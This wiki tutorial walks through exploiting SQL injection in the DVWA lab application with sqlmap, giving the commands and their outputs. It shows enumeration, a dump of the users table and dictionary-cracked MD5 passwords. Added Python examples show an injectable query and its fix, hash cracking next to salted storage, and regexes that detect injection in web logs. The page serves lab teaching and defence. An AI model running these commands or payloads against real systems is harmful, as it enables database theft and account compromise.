DVWA: Exploit using sqlmap

From OnnoWiki
Latest revision as of 10:24, 3 May 2017

Source: https://pentestlab.wordpress.com/2012/11/24/owning-the-database-with-sqlmap/

DVWA URL being attacked

http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#

Fingerprinting the database (-f)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -f 

The output looks roughly like this:

[09:38:21] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               comment injection fingerprint: MySQL 5.7.11
               html error message fingerprint: MySQL


Retrieving the database banner (-b)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -b

The output looks roughly like this:

[09:41:30] [WARNING] reflective value(s) found and filtering out
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5
banner:    '5.7.11-0ubuntu6'

List databases (--dbs)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" --dbs

The output looks roughly like this:

[09:48:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[09:48:29] [INFO] fetching database names
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys


List the tables in a database (-D databasename --tables)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa --tables

The output looks roughly like this:

[09:50:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[09:50:45] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

View the structure of a table (-T tablename --columns)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -T users --columns

The output looks roughly like this:

[09:52:30] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+
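The column listing above is what sqlmap reached through the id parameter of the URL being attacked. The following Python example is added here and is not DVWA's own code: it models the kind of string-built query that makes the id parameter injectable (in the style of DVWA's "low" security level) next to a parameterised version, using an in-memory SQLite table with a subset of the users columns shown above. The rows are constructed sample data modelled on the dump on this page; make_db, lookup_vulnerable, lookup_safe and parse_id are names chosen for this example.

```python
import sqlite3

# Constructed sample rows modelled on the dvwa.users dump on this page
# (a subset of the columns listed above); not DVWA's own data.
USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "Gordon", "Brown", "e99a18c428cb38d5f260853678922e03"),
    (3, "1337", "Hack", "Me", "8d3533d75ae2c3966d7e0d4fcc69216b"),
]


def make_db():
    """Build an in-memory SQLite stand-in for the dvwa database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, "
        "first_name TEXT, last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Query assembled by string interpolation, in the style of DVWA's
    'low' level: whatever arrives in ?id= becomes SQL text, which is the
    hole sqlmap drives its boolean and UNION tests through."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised query: the value travels separately from the statement,
    so it can only ever be compared, never parsed as SQL."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def parse_id(raw):
    """Defence in depth: the endpoint only expects a small integer id
    (user_id is int(6) in the schema above), so reject anything else
    before it reaches the database at all."""
    if not raw.isdigit() or len(raw) > 6:
        raise ValueError(f"invalid id: {raw!r}")
    return int(raw)


if __name__ == "__main__":
    db = make_db()
    payload = "1' OR '1'='1"   # tautology of the same shape sqlmap probes for
    print("vulnerable:", lookup_vulnerable(db, payload))   # every row comes back
    print("safe:      ", lookup_safe(db, payload))         # no row has that literal id
    try:
        parse_id(payload)
    except ValueError as err:
        print("rejected:  ", err)
```

The parameterised query is the fix; parse_id is the extra layer that also turns sqlmap's probing into an immediate 4xx instead of a 200 with a subtly different page, which is what its boolean-based detection relies on.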

Dump Password (-C password --dump)

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -C password --dump


The output looks roughly like this:


Database: dvwa
Table: users
[5 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
+---------------------------------------------+

[09:54:53] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.0.100/dump/dvwa/users.csv'


Or, for a more complete dump, use the command

sqlmap -u "http://192.168.0.100/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=mgpoe8u061npgiv233q2ved227" -D dvwa -T users --dump

The output looks roughly like this:

Database: dvwa
Table: users
[5 entries]
+---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar                                                   | user    | password                                    | last_name | first_name | last_login          | failed_login |
+---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | http://192.168.0.100/DVWA-1.9/hackable/users/admin.jpg   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2017-04-17 19:15:11 | 0            |
| 2       | http://192.168.0.100/DVWA-1.9/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2017-04-17 19:15:11 | 0            |
| 3       | http://192.168.0.100/DVWA-1.9/hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2017-04-17 19:15:11 | 0            |
| 4       | http://192.168.0.100/DVWA-1.9/hackable/users/pablo.jpg   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2017-04-17 19:15:11 | 0            |
| 5       | http://192.168.0.100/DVWA-1.9/hackable/users/smithy.jpg  | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2017-04-17 19:15:11 | 0            |
+---------+----------------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+

As we can see from the output above, sqlmap found the password hashes in the password column and cracked them successfully using a dictionary attack. We now have the passwords together with the usernames of the DVWA users, which means the database and the application have been completely compromised.
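The dictionary attack succeeded so quickly because the password column (varchar(32)) holds unsalted MD5 digests: one hash computation per candidate word tests every user at once, and two users with the same password share a digest. The following Python example is added here and is not part of the original page or of sqlmap. It reproduces that lookup against the four distinct hashes from the dump above with a constructed wordlist, then shows the salted, iterated PBKDF2 storage a defender would use instead. crack_md5, hash_password, verify_password and salted_storage_defeats_table are names chosen for this example, and the 600,000 iteration count follows the current OWASP recommendation for PBKDF2-HMAC-SHA256 (an assumption; tune it to your own policy).

```python
import hashlib
import hmac
import os

# The four distinct hashes from the sqlmap dump above, keyed by username.
DUMPED = {
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337": "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo": "0d107d09f5bbe40cade3de5c71e9e9b7",
}

# Constructed wordlist: a handful of entries of the kind any dictionary contains.
WORDLIST = ["123456", "qwerty", "password", "letmein", "abc123", "charley", "dragon"]

# OWASP's current recommendation for PBKDF2-HMAC-SHA256 (assumption: tune to policy).
ITERATIONS = 600_000


def crack_md5(hashes, wordlist):
    """Dictionary attack as sqlmap performs it: with unsalted MD5 each word is
    hashed once and that single digest is checked against every user."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table.get(digest) for user, digest in hashes.items()}


def hash_password(password, salt=None):
    """Store a password as a random salt plus a slow, iterated PBKDF2 digest."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def salted_storage_defeats_table():
    """Two users with the same password no longer share a digest, so the
    precomputed table used in crack_md5 cannot be reused across accounts."""
    a = hash_password("password")
    b = hash_password("password")
    return a != b and verify_password("password", a) and verify_password("password", b)


if __name__ == "__main__":
    for user, word in crack_md5(DUMPED, WORDLIST).items():
        print(f"{user:8} -> {word}")
    print("salted PBKDF2 resists the shared table:", salted_storage_defeats_table())
```

In the dump, admin and smithy share 5f4dcc3b5aa765d61d8327deb882cf99 because both use "password"; with the salted scheme each attempt must be recomputed per user at 600,000 iterations, which turns a sub-second table lookup into a per-account brute force.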

Conclusion

In this tutorial we saw how effective the sqlmap tool is when we have to identify and exploit SQL injection vulnerabilities. Of course, the proper way to exploit an SQL injection vulnerability is manually. However, in many penetration tests the use of sqlmap is necessary because of time constraints.

In this particular case sqlmap managed to enumerate the database successfully and to extract data from the database tables very quickly. Of course sqlmap has many more capabilities, such as checking for the presence of a WAF (Web Application Firewall), IDS and IPS, and executing operating system commands. For all these reasons this tool should be in the toolkit of every penetration tester.
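The flip side of sqlmap's speed is that the enumeration shown in this tutorial is noisy: many requests to one parameter in a few seconds, a default User-Agent that names the tool, and payloads with recognisable shapes. The following Python example is added here and is not part of the original page or of sqlmap; it runs three simple checks (User-Agent, payload pattern, per-IP request burst to one path) over constructed Apache combined-format log lines modelled on requests to the DVWA endpoint above. The log lines, IP addresses, timestamps and the sqlmap/1.1.4#stable User-Agent string are constructed samples; analyze and burst_threshold are names chosen for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Payload shapes that sqlmap's boolean, UNION and time-based techniques leave
# in the query string (checked after URL decoding).
SQLI_RE = re.compile(
    r"(\bUNION\b.*\bSELECT\b|\bAND\b\s+\d+=\d+|\bSLEEP\(|information_schema"
    r"|@@version|\bOR\b\s+['\"]?\w+['\"]?=)",
    re.I,
)

# Constructed sample lines, modelled on the DVWA endpoint used on this page;
# not real captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Apr/2017:19:20:01 +0000] "GET /DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4511 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Apr/2017:19:21:10 +0000] "GET /DVWA-1.9/vulnerabilities/sqli/?id=1%27%20AND%208693%3D8693%20AND%20%27x%27%3D%27x&Submit=Submit HTTP/1.1" 200 4511 "-" "sqlmap/1.1.4#stable (http://sqlmap.org)"
10.0.0.9 - - [17/Apr/2017:19:21:10 +0000] "GET /DVWA-1.9/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2Cschema_name%20FROM%20information_schema.schemata--%20&Submit=Submit HTTP/1.1" 200 5120 "-" "sqlmap/1.1.4#stable (http://sqlmap.org)"
10.0.0.9 - - [17/Apr/2017:19:21:11 +0000] "GET /DVWA-1.9/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29--%20&Submit=Submit HTTP/1.1" 200 4511 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""


def analyze(log_text, burst_threshold=3):
    """Return {ip: [reasons]} for clients whose requests look like sqlmap activity."""
    reasons = defaultdict(set)
    hits = defaultdict(int)  # (ip, path without query) -> request count
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        ip, ua, path = m["ip"], m["ua"], m["path"]
        base, _, query = path.partition("?")
        hits[(ip, base)] += 1
        if "sqlmap" in ua.lower():
            reasons[ip].add("sqlmap user-agent")
        if SQLI_RE.search(unquote_plus(query)):
            reasons[ip].add("sqli pattern in query")
    for (ip, base), n in hits.items():
        if n >= burst_threshold:
            reasons[ip].add(f"{n} requests to {base}")
    return {ip: sorted(r) for ip, r in reasons.items()}


if __name__ == "__main__":
    for ip, why in analyze(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(why))
```

The User-Agent check is the cheapest and the weakest (sqlmap can be told to send any string), which is why the fourth sample line, sent with a browser-like User-Agent, is still caught by the payload pattern; the burst threshold needs tuning per site, since three hits to one path in a second is normal for a busy page.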

